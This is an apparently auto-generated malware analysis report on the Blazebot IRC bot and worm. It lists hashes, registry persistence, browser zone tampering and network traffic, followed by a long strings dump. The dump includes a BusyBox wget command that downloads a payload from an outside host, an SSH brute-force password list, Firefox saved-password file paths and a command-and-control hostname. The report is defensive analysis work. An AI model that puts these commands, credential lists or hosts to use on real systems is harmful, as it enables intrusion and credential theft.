Blazebot_a7dd53b4ba

by malwarelabrobot on May 16th, 2014 in Malware Descriptions.

Trojan.Win32.Blazebot.uv (Kaspersky), Gen:Variant.Graftor.140744 (AdAware), GenericMSNWorm.YR, GenericAutorunWorm.YR, GenericIRCBot.YR, GenericProxy.YR, Blazebot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a7dd53b4ba87329c91719e2c45b2b426
SHA1: 639bde2db05d12d28faa387974f9e43436300c64
SHA256: 59ede0763198ab755f9d44e007346262dcf87dde8f21e2188cdbe8b80a2d3782
SSDeep: 12288:W7bVSmSXloZPe9ACTTnxFYcD0qLNkW xKdxOWRiirQe1uBFCtkCLUmZC0Jhq6pq:FloJe9ACT/YC0EmW6LiFEIkuZChL
Size: 1119744 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: Windows
Created at: 2014-04-30 19:31:23
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via IRC channel.
MSNWorm A worm can spread its copies through the MSN Messanger.
Trojan-Proxy This program can launch a proxy server (SOCKS4) on a designated TCP port.


Process activity

The Trojan creates the following process(es):

%original file name%.exe:3272
system32.exe:3300

The Trojan injects its code into the following process(es):

system32.exe:3220

File activity

The process %original file name%.exe:3272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%.exe (7547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

The process system32.exe:3220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\8LQCYG2J.txt (119 bytes)
%Documents and Settings%\%current user%\Cookies\N8VWP5L8.txt (119 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\8LQCYG2J.txt (0 bytes)

Registry activity

The process %original file name%.exe:3272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 B2 3A EA E6 A5 B0 8E BA 2B 34 8A 21 EA 49 B3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows Data Serivce" = "system32.exe"

The process system32.exe:3220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA C1 32 DB 6F AF DE B3 84 D8 9B 2D 20 C3 97 94"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

A worm can spread its copies through the MSN Messanger.

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 35396 35840 4.55836 2341c1e6476c6c6ed4cacd63d20cb2f6
.rdata 40960 7540 7680 3.79913 95b704827cbd1a172aade85afe108f99
.data 49152 28892 22016 5.08547 d8857c4d91d6ce5eb54a1e0542fce9d3
.rsrc 81920 1053016 1053184 4.33074 c01d90f67e6005110cbecad5872beb3c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.whatismyip.com/ 141.101.120.14
hxxp://checkip.dyndns.com/
hxxp://checkip.dyndns.org/ 91.198.22.70


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CNC Shadowserver Reported CnC Server IP group 11
ET CNC Shadowserver Reported CnC Server IP group 10
ET CHAT IRC authorization message
ET WEB_CLIENT Possible HTTP 403 XSS Attempt (External Source)
ET SCAN Potential SSH Scan OUTBOUND
ET POLICY Internal Host Retrieving External IP via whatismyip.com - Possible Infection
ET POLICY DynDNS CheckIp External IP Address Server Response

Traffic

GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2f815f827b3662adca9e3cc741e6e0791400130860605; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f6c6230868-IAD
2b3..<html>.<head><title>403 Forbidden</title>
 <script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"da3beb867
a8e8a2c528b9b410231214f5da11e04-1400130860-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
 src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..nt>....


GET / HTTP/1.1


Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1540bf5fa547d44142d2f65dade778411400130860824; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f826450868-IAD
2b3..<html>.<head><title>403 Forbidden</title>
 <script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"da3beb867
a8e8a2c528b9b410231214f5da11e04-1400130860-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
 src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..



GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache

GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 105
<html><head><title>Current IP Check</title><
;/head><body>Current IP Address: "%local server IP%"</body>&l
t;/html>....



GET / HTTP/1.1
Host: checkip.dyndns.org
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 105
<html><head><title>Current IP Check</title><
;/head><body>Current IP Address: "%local server IP%"</body>&l
t;/html>....



GET / HTTP/1.1
Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d2f815f827b3662adca9e3cc741e6e0791400130860605; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f6c07a0868-IAD
2b3..<html>.<head><title>403 Forbidden</title>
 <script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"da3beb867
a8e8a2c528b9b410231214f5da11e04-1400130860-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
 src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..nt>....


GET / HTTP/1.1


Host: VVV.whatismyip.com
Cache-Control: no-cache


HTTP/1.1 403 Forbidden
Server: cloudflare-nginx
Date: Thu, 15 May 2014 05:14:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d1540bf5fa547d44142d2f65dade778411400130860824; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.whatismyip.com; HttpOnly
Vary: Accept-Encoding
CF-RAY: 12acd9f820bd0868-IAD
2b3..<html>.<head><title>403 Forbidden</title>
 <script type="text/javascript">.//<![CDATA[.try{if (!window.
CloudFlare) {var CloudFlare=[{verbose:0,p:0,byc:0,owlid:"cf",bag2:1,mi
rage2:{profile:false},oracle:0,paths:{cloudflare:"/cdn-cgi/nexp/dok9v=
790cacef83/"},atok:"8d48c2e2001055edbb9e94cf8da95e79",petok:"ede762f2d
3eb053293842f464fa09c1e9b0be355-1400130861-1800",zone:"whatismyip.com"
,rocket:"a",apps:0}];document.write('<script type="text/javascript"
 src="//ajax.cloudflare.com/cdn-cgi/nexp/dok9v=97fb4d042e/cloudflare.m
in.js"><' '\/script>');}}catch(e){};.//]]>.</script>
.</head>.<body bgcolor="white">.<center><h1>40
3 Forbidden</h1></center>.<hr><center>nginx/1.
4.7</center>.</body>.</html>..1.....0..1.....0..

The Trojan connects to the servers at the folowing location(s):

system32.exe_3220:

.text
`.rdata
@.data
.rsrc
PSSh]
t1SSSSh
SSShx
PSSh*t@
3|$43|$$
3|$<3|$$
3|$(3|$,
.EOWSU
msn.msg
msn.stop
login
firefox
join
Big Number part of OpenSSL 0.9.8j 07 Jan 2009
SHA1 part of OpenSSL 0.9.8j 07 Jan 2009
MD5 part of OpenSSL 0.9.8j 07 Jan 2009
RSA part of OpenSSL 0.9.8j 07 Jan 2009
DSA part of OpenSSL 0.9.8j 07 Jan 2009
len>=0 && len<=(int)sizeof(ctx->key)
j <= (int)sizeof(ctx->key)
EVP part of OpenSSL 0.9.8j 07 Jan 2009
CERTIFICATE REQUEST
NEW CERTIFICATE REQUEST
CERTIFICATE
RSA PRIVATE KEY
DSA PRIVATE KEY
EC PRIVATE KEY
RAND part of OpenSSL 0.9.8j 07 Jan 2009
You need to read the OpenSSL FAQ, http://www.openssl.org/support/faq.html
%s(%d): OpenSSL internal error, assertion failed: %s
Diffie-Hellman part of OpenSSL 0.9.8j 07 Jan 2009
SHA-256 part of OpenSSL 0.9.8j 07 Jan 2009
SHA-512 part of OpenSSL 0.9.8j 07 Jan 2009
DlRIPE-MD160 part of OpenSSL 0.9.8j 07 Jan 2009
CAST part of OpenSSL 0.9.8j 07 Jan 2009
RC4 part of OpenSSL 0.9.8j 07 Jan 2009
Blowfish part of OpenSSL 0.9.8j 07 Jan 2009
Microsoft Local Key set
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
certificateIssuer
certicom-arc
Proxy Certificate Information
proxyCertInfo
Microsoft Smartcardlogin
msSmartcardLogin
joint-iso-itu-t
JOINT-ISO-ITU-T
set-rootKeyThumb
setAttr-Cert
setCext-cCertRequired
setCext-certType
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertResData
setct-CertReqTBS
setct-CertReqData
setct-PCertResTBS
setct-PCertReqData
setct-AcqCardCodeMsg
certificate extensions
set-certExt
set-msgExt
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-caKeyUpdateInfo
id-it-encKeyPairTypes
id-it-signKeyPairTypes
id-it-caProtEncCert
id-mod-attribute-cert
id-mod-qualified-cert-93
id-mod-qualified-cert-88
id-smime-aa-ets-certCRLTimestamp
id-smime-aa-ets-certValues
id-smime-aa-ets-CertificateRefs
id-smime-aa-ets-otherSigCert
id-smime-aa-smimeEncryptCerts
id-smime-aa-signingCertificate
id-smime-aa-encrypKeyPref
id-smime-aa-msgSigDigest
id-smime-ct-publishCert
id-smime-mod-msg-v3
sdsiCertificate
x509Certificate
localKeyID
certBag
pkcs8ShroudedKeyBag
keyBag
pbeWithSHA1And2-KeyTripleDES-CBC
pbeWithSHA1And3-KeyTripleDES-CBC
TLS Web Client Authentication
TLS Web Server Authentication
X509v3 Extended Key Usage
extendedKeyUsage
X509v3 Authority Key Identifier
authorityKeyIdentifier
X509v3 Certificate Policies
certificatePolicies
X509v3 Private Key Usage Period
privateKeyUsagePeriod
X509v3 Key Usage
keyUsage
X509v3 Subject Key Identifier
subjectKeyIdentifier
Netscape Certificate Sequence
nsCertSequence
Netscape CA Policy Url
nsCaPolicyUrl
Netscape Renewal Url
nsRenewalUrl
Netscape CA Revocation Url
nsCaRevocationUrl
Netscape Revocation Url
nsRevocationUrl
Netscape Base Url
nsBaseUrl
Netscape Cert Type
nsCertType
Netscape Certificate Extension
nsCertExt
extendedCertificateAttributes
challengePassword
dhKeyAgreement
pubkey
PEM part of OpenSSL 0.9.8j 07 Jan 2009
phrase is too short, needs to be at least %d chars
Enter PEM pass phrase:
TRUSTED CERTIFICATE
X509 CERTIFICATE
PRIVATE KEY
ANY PRIVATE KEY
ENCRYPTED PRIVATE KEY
enc_key
key_enc_algor
cert
d.encrypted
d.digest
d.signed_and_enveloped
d.enveloped
d.sign
d.data
d.other
NETSCAPE_CERT_SEQUENCE
certs
.\crypto\pem\pem_pkey.c
X509_PUBKEY
public_key
priv_key
pub_key
.\crypto\ec\ec_key.c
EC_PRIVATEKEY
publicKey
privateKey
value.implicitlyCA
value.parameters
value.named_curve
p.char_two
p.prime
p.ppBasis
p.tpBasis
p.onBasis
p.other
EVP_CIPHER_key_length(cipher) <= (int)sizeof(md_tmp)
USER32.DLL
NETAPI32.DLL
KERNEL32.DLL
ADVAPI32.DLL
lhash part of OpenSSL 0.9.8j 07 Jan 2009
Stack part of OpenSSL 0.9.8j 07 Jan 2009
.\crypto\dh\dh_key.c
ASN.1 part of OpenSSL 0.9.8j 07 Jan 2009
value.single
value.set
.\crypto\evp\evp_key.c
nkey <= EVP_MAX_KEY_LENGTH
cert_info
EC part of OpenSSL 0.9.8j 07 Jan 2009
ECDSA part of OpenSSL 0.9.8j 07 Jan 2009
PKCS8_PRIV_KEY_INFO
pkey
pkeyalg
.\crypto\evp\evp_pkey.c
keylen <= sizeof key
.\crypto\pkcs12\p12_key.c
RC2 part of OpenSSL 0.9.8j 07 Jan 2009
IDEA part of OpenSSL 0.9.8j 07 Jan 2009
AUTHORITY_KEYID
keyid
X509_CERT_PAIR
X509_CERT_AUX
keylength
keyfunc
MD2 part of OpenSSL 0.9.8j 07 Jan 2009
%'%1%=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
Verifying - %s
%lu:%s:%s:%d:%s
error:lX:%s:%s:%s
d.usernotice
d.cpsuri
CERTIFICATEPOLICIES
%*sCPS: %s
%*sExplicit Text: %s
%*sNumber%s:
%*sOrganization: %s
d.registeredID
d.iPAddress
d.uniformResourceIdentifier
d.ediPartyName
d.directoryName
d.dNSName
d.rfc822Name
d.otherName
value.bag
value.safes
value.shkeybag
value.keybag
value.sdsicert
value.x509cert
value.other
'() ,-./:=?
CONF part of OpenSSL 0.9.8j 07 Jan 2009
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
%*sPolicy Text: %s
%*scrlUrl:
EXTENDED_KEY_USAGE
%*sZone: %s, User:
certificateHold
Certificate Hold
cessationOfOperation
Cessation Of Operation
keyCompromise
Key Compromise
name.relativename
name.fullname
.\crypto\x509v3\v3_akey.c
IP Address:%d.%d.%d.%d
URI:%s
DNS:%s
email:%s
EdiPartyName:
X400Name:
othername:
PKEY_USAGE_PERIOD
keyCertSign
Certificate Sign
keyAgreement
Key Agreement
keyEncipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
CONF_def part of OpenSSL 0.9.8j 07 Jan 2009
[[%s]]
[%s] %s=%s
PROXY_CERT_INFO_EXTENSION
crlUrl
certStatus
certId
OCSP_CERTSTATUS
value.unknown
value.revoked
value.good
value.byKey
value.byName
reqCert
OCSP_CERTID
issuerKeyHash
%s - d:d:d %d%s
\X
- %-15s
%s.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
1.2.3
inflate 1.2.3 Copyright 1995-2005 Mark Adler
__MSVCRT_HEAP_SELECT
GetWindowsDirectoryA
VkKeyScanA
keybd_event
USER32.dll
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
USERENV.dll
WS2_32.dll
GetCPInfo
GetProcessWindowStation
DI32.dll
ReportEventA
reptile.exe
libssh2_banner_set
libssh2_base64_decode
libssh2_channel_close
libssh2_channel_direct_tcpip_ex
libssh2_channel_eof
libssh2_channel_flush_ex
libssh2_channel_forward_accept
libssh2_channel_forward_cancel
libssh2_channel_forward_listen_ex
libssh2_channel_free
libssh2_channel_get_exit_status
libssh2_channel_handle_extended_data
libssh2_channel_handle_extended_data2
libssh2_channel_open_ex
libssh2_channel_process_startup
libssh2_channel_read_ex
libssh2_channel_receive_window_adjust
libssh2_channel_request_pty_ex
libssh2_channel_request_pty_size_ex
libssh2_channel_send_eof
libssh2_channel_set_blocking
libssh2_channel_setenv_ex
libssh2_channel_wait_closed
libssh2_channel_wait_eof
libssh2_channel_window_read_ex
libssh2_channel_window_write_ex
libssh2_channel_write_ex
libssh2_channel_x11_req_ex
libssh2_hostkey_hash
libssh2_poll
libssh2_poll_channel_read
libssh2_session_abstract
libssh2_session_block_directions
libssh2_session_callback_set
libssh2_session_disconnect_ex
libssh2_session_flag
libssh2_session_free
libssh2_session_get_blocking
libssh2_session_init_ex
libssh2_session_last_errno
libssh2_session_last_error
libssh2_session_method_pref
libssh2_session_methods
libssh2_session_set_blocking
libssh2_session_startup
libssh2_trace
libssh2_userauth_authenticated
libssh2_userauth_hostbased_fromfile_ex
libssh2_userauth_keyboard_interactive_ex
libssh2_userauth_list
libssh2_userauth_password_ex
libssh2_userauth_publickey_fromfile_ex
sshspreadscan
sshgodscan
sshadminscan
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
I tried to fool %d morons.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER blaze * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
https:/
http:/
system32.exe
Windows Data Serivce
#sshscan2
EFTP//
ftpd.exe
underirc.sytes.net.
#sshchannel2
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
passwd
01010101
10101010
rootwebmaster
rootwebadmin
ftpuserftpuser
mysqlmysql
pgsqlpgsql
webweb
webmasterwebmaster
ftpserver
webserver
ftpftp
webadmin
webadmin1
webmaster
0987654321
1234567890
monkey1
PaSsWoRd
69696969
mypass
12341234
7654321
87654321
monkey
password1
newpass
systempass
%s %s: SSH USELESS: root@%s %s .
%s %s: SSH WIN: root@%s %s .
password
%s %s: SSH LOL: root:%s@%s .
BusyBox Instructed: %s.
./1.jpg
chmod  x 1.jpg
test ! -e 1.jpg && busybox wget http://www.e-qacs.com/1.jpg
wget http://www.e-qacs.com/1.jpg
BusyBox Fail@ShellOpen: %s.
BusyBox Fail@PtyOpen: %s.
BusyBox Fail@ChannelOpen: %s.
Setting local Banner: %s
Setting Callback %d
Unable to ask for ssh-userauth service
Would block asking for ssh-userauth service
ssh-userauth
Unable to exchange encryption keys
Would block exchanging encryption keys
session_startup for socket %d
Received Banner: %s
SSH-2.0-libssh2_1.0
Disconnecting: reason=%d, desc=%s, lang=%s
Setting blocking mode on session %d
Invalid descriptor passed to libssh2_poll()
Permitted auth methods: %s
ssh-connection
Unable to send userauth-password-change request
Unable to allocate memory for userauth-password-change request
Password expired, and callback failed
Password Expired, and no callback specified
Password authentication successful
Password change required
Unable to send userauth-password request
Attempting to login using password authentication
Unable to allocate memory for userauth-password request
Invalid signature for supplied public key, or bad username/public key combination
Invalid key data, not base64 encoded
Invalid public key data
Missing public key data
Unable to read public key from file
Unable to allocate memory for public key data
Invalid data in public key file
Unable to open public key file
Loading public key file: %s
Unable to initialize private key from file
No handler for specified private key
Loading private key file: %s
Publickey authentication successful
Attempting publickey authentication -- phase 2
Failed allocating additional space for userauth-publickey packet
Username/PublicKey combination invalid
Pubkey authentication prematurely successful
Unable to send userauth-publickey request
Attempting publickey authentication
publickey
Keyboard-interactive authentication successful
Unable to send userauth-keyboard-interactive request
Unable to allocate memory for keyboard-interactive prompt message
Unable to allocate memory for keyboard-interactive response packet
Keyboard-interactive response callback function invoked
Unable to allocate memory for keyboard-interactive responses array
Unable to allocate memory for keyboard-interactive prompts array
Unable to allocate memory for keyboard-interactive 'instruction' request field
Unable to allocate memory for keyboard-interactive 'name' request field
Unable to send keyboard-interactive request
Attempting keyboard-interactive authentication
keyboard-interactive
Unable to allocate memory for keyboard-interactive authentication
Opening Channel - win %d pack %d
direct-tcpip
Unable to allocate memory for direct-tcpip connection
Requesting direct-tcpip session to from %s:%d to %s:%d
Dynamic tcpip-forward port allocated: %d
0.0.0.0
tcpip-forward
Requesting tcpip-forward session for %s:%d
cancel-tcpip-forward
Cancelling tcpip-forward session for %s:%d
Setting remote environment variable: %s=%s on channel %lu/%lu
Requesting x11-req for channel %lu/%lu: single=%d proto=%s cookie=%s screen=%d
starting request(%s) on channel %lu/%lu, message=%s
Flushing %d bytes of data from stream %lu on channel %lu/%lu
Setting channel %lu/%lu handle_extended_data mode to %d
Reading %d of buffered data from %lu/%lu/%d
Attempting to read %d bytes from channel %lu/%lu stream #%d
libssh2_packet_write returned EAGAIN
Sending %d bytes on channel %lu/%lu, stream_id=%d
Splitting write block due to %lu byte packet_size on %lu/%lu/%d
Splitting write block due to %lu byte window_size on %lu/%lu/%d
Writing %d bytes on channel %lu/%lu, stream #%d
libssh2_channel_wait_closed() invoked when channel is not in EOF state
Renegotiating Keys
Unable to allocate memory for LIBSSH2_PACKET
X11 Connection Received from %s:%ld on channel %lu
Remote received connection from %s:%ld to %s:%ld
forwarded-tcpip
Ignoring extended data and refunding %d bytes
Debug Packet: %s
Disconnect(%d): %s(%s)
Packet type %d received, length=%d
Looking for packet of type: %d
May block until packet of type %d becomes available
Redirecting into the key re-exchange
Initiating Diffie-Hellman Group1 Key Exchange
Server to Client HMAC Key calculated
Client to Server HMAC Key calculated
Server to Client IV and Key calculated
Client to Server IV and Key calculated
Received NEWKEYS message
Timed out waiting for NEWKEYS
Unable to send NEWKEYS message
Sending NEWKEYS message
Unable to verify hostkey signature
Unable to initialize hostkey importer
Unable to allocate memory for a copy of the host key
Burnt packet of type: x
Sending KEX packet %d
Initiating Diffie-Hellman Group14 Key Exchange
Unrecoverable error exchanging keys
Agreed on COMP_SC method: %s
